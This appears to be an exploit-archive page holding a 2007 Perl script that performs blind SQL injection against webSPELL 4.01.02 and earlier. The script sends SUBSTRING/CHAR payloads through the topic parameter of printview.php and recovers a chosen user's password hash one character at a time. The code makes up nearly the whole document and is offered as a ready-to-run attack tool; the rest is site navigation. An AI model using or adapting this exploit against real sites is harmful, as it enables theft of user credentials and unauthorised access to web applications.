webspell-sql.txt

webspell-sql.txt: Posted Feb 24, 2007; Authored by DNX; webSPELL versions 4.01.02 and below remote SQL injection exploit.; tags | exploit, remote, sql injection; SHA-256 | 7c807c519d7546a867aa112ace64dccde86e27c9a74c12c96c1630f57b2f037c; Download | Favorite | View

webspell-sql.txt

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[2])
{
  print "\n                           \\#'#/                       ";
  print "\n                           (-.-)                        ";
  print "\n   -------------------oOO---(_)---OOo-------------------";
  print "\n   | webSPELL <= v4.01.02 (topic) Remote SQL Injection |";
  print "\n   |                   coded by DNX                    |";
  print "\n   -----------------------------------------------------";
  print "\n[!] Bug: in printview.php line 61, inject sql code in \$topic";
  print "\n[!] Solution: install security fix";
  print "\n[!] Usage: perl ws.pl [Host] [Path] [Topic] <Options>";
  print "\n[!] Example: perl ws.pl 127.0.0.1 /webspell/ -tid 1 -uid 2 -t my_user";
  print "\n[!] Options:";
  print "\n       -tid [no]     Valid topic-ID";
  print "\n       -uid [no]     User-ID, default is 1";
  print "\n       -t [name]     Changed the user table name, default is webs_user";
  print "\n       -p [ip:port]  Proxy support";
  print "\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $user    = 1;
my $table   = "webs_user";
my $topic   = 0;
my %options = ();
GetOptions(\%options, "tid=i", "uid=i", "t=s", "p=s");

print "[!] Exploiting...\n";

if($options{"tid"})
{
  $topic = $options{"tid"};
}
else
{
  print "[!] Exploit failed, missing parameter\n";
  exit;
}

if($options{"uid"})
{
  $user = $options{"uid"};
}

if($options{"t"})
{
  $table = $options{"t"};
}

syswrite(STDOUT, "[!] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $found = 0;
  my $h = 48;
  while(!$found && $h <= 57)
  {
    if(istrue3($host, $path, $table, $topic, $user, $i, $h))
    {
      $found = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$found)
  {
    $h = 97;
    while(!$found && $h <= 122)
    {
      if(istrue3($host, $path, $table, $topic, $user, $i, $h))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[!] Exploit done\n";

sub istrue3
{
  my $host  = shift;
  my $path  = shift;
  my $table = shift;
  my $tid   = shift;
  my $uid   = shift;
  my $i     = shift;
  my $h     = shift;
  
  my $ua = LWP::UserAgent->new;
  my $url = "http://".$host.$path."printview.php?board=1&topic=".$tid."'%20AND%20SUBSTRING((SELECT%20password%20FROM%20".$table."%20WHERE%20userID=".$uid."),".$i.",1)=CHAR(".$h.")/*";
  
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
  
  my $response = $ua->get($url);
  my $content = $response->content;
  my $regexp = "<b>Main Board</b>";
  
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}

Top Authors In Last 30 Days

Red Hat 286 files
indoushka 161 files
Jay Turla 150 files
Ubuntu 71 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,128)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,774)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,823)
UNIX (9,453)
UnixWare (188)
Windows (6,765)
Other

webspell-sql.txt

webspell-sql.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

webspell-sql.txt

Share This

webspell-sql.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems